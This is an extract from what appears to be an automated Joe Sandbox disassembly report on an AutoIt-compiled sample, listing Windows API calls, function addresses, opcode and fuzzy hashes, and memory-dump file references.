                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3413494760-0
                                                                                                                                                                                                                • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                                                                                                                                • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                                                                                                                                                • String ID: AU3_FreeVar
                                                                                                                                                                                                                • API String ID: 2634073740-771828931
                                                                                                                                                                                                                • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                                                                                                                                                • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoInitialize.OLE32 ref: 0046C63A
                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 0046C645
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                  • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                                                                                                                                  • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                                                                                                                                • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                                                                                                                                • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                                                                                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                • API String ID: 2294789929-1287834457
                                                                                                                                                                                                                • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                                                                                                                                • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                                                                                                                  • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                                                                                                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                                                                                                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                                                                                                                                • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                                                                                                                                • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                                                                                                                                • ReleaseCapture.USER32 ref: 0047116F
                                                                                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                • API String ID: 2483343779-2107944366
                                                                                                                                                                                                                • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                                                                                                                                                • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00450720
                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00450733
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                                                                                                                                • String ID: -----$SysListView32
                                                                                                                                                                                                                • API String ID: 4008455318-3975388722
                                                                                                                                                                                                                • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                                                                                                                • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                                                                                                                                • GetParent.USER32 ref: 00469C98
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                                                                                                                                • GetParent.USER32 ref: 00469CBC
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: MessageSend$CtrlParent$_memmove_wcslen
• String ID: ComboBox$ListBox
• API String ID: 2360848162-1403004172
• Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
• Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
• Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
• Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
APIs
Similarity
• API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
• String ID:
• API String ID: 262282135-0
• Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
• Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
• Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
• Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
• GetWindowLongW.USER32(?,000000F0), ref: 004481CF
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
• SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
• SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
• SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
• SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
• SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
• Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
• Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
• Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
• Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
APIs
  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
• SendMessageW.USER32(753E23D0,00001001,00000000,?), ref: 00448E16
• SendMessageW.USER32(753E23D0,00001026,00000000,?), ref: 00448E25
  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
Similarity
• API ID: MessageSend$BrushCreateDeleteObjectSolid
• String ID:
• API String ID: 3771399671-0
• Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
• Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
• Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
• Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
APIs
• GetCurrentThreadId.KERNEL32 ref: 00434643
• GetForegroundWindow.USER32(00000000), ref: 00434655
• GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
• GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
• Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
• Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
• Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID:
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 0-1603158881
• Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
• Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
• Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
• Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
APIs
• CreateMenu.USER32 ref: 00448603
• SetMenu.USER32(?,00000000), ref: 00448613
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
• IsMenu.USER32(?), ref: 004486AB
• CreatePopupMenu.USER32 ref: 004486B5
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
• DrawMenuBar.USER32 ref: 004486F5
Strings
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup
• String ID: 0
• API String ID: 161812096-4108050209
• Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
• Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
• Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
• Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
• Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
• Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
• Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
• Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
• Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
• Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
APIs
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
• lstrcmpiW.KERNEL32(?,?), ref: 00453900
• MoveFileW.KERNEL32(?,?), ref: 00453932
Similarity
• API ID: File$AttributesFullMoveNamePathlstrcmpi
• String ID:
• API String ID: 978794511-0
• Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
• Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
• Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
• Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
Similarity
• API ID: _memmove$_memcmp
• String ID: '$\$h
• API String ID: 2205784470-1303700344
APIs
• VariantInit.OLEAUT32(00000000), ref: 0045EA56
• VariantCopy.OLEAUT32(00000000), ref: 0045EA60
• VariantClear.OLEAUT32 ref: 0045EA6D
• VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
• __swprintf.LIBCMT ref: 0045EC33
• VariantInit.OLEAUT32(00000000), ref: 0045ECEE
Strings
• %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
Similarity
• API ID: Variant$InitTime$ClearCopySystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d
• API String ID: 2441338619-1568723262
APIs
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
• Sleep.KERNEL32(0000000A), ref: 0042C67F
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
Similarity
• API ID: Interlocked$DecrementIncrement$Sleep
• String ID: @COM_EVENTOBJ
• API String ID: 327565842-2228938565
APIs
• VariantClear.OLEAUT32(?), ref: 0047031B
• VariantClear.OLEAUT32(?), ref: 0047044F
• VariantInit.OLEAUT32(?), ref: 004704A3
• DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
• VariantClear.OLEAUT32(?), ref: 00470516
  • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
• VariantCopy.OLEAUT32(?,?), ref: 0047057A
  • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
• VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                                                                                                                                                • String ID: H
                                                                                                                                                                                                                • API String ID: 3613100350-2852464175
                                                                                                                                                                                                                • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                                                                                                                                                • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                                                                                                                                • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                                                                                                                • String ID: close all
                                                                                                                                                                                                                • API String ID: 4174999648-3243417748
                                                                                                                                                                                                                • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                                                                                                                                                • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
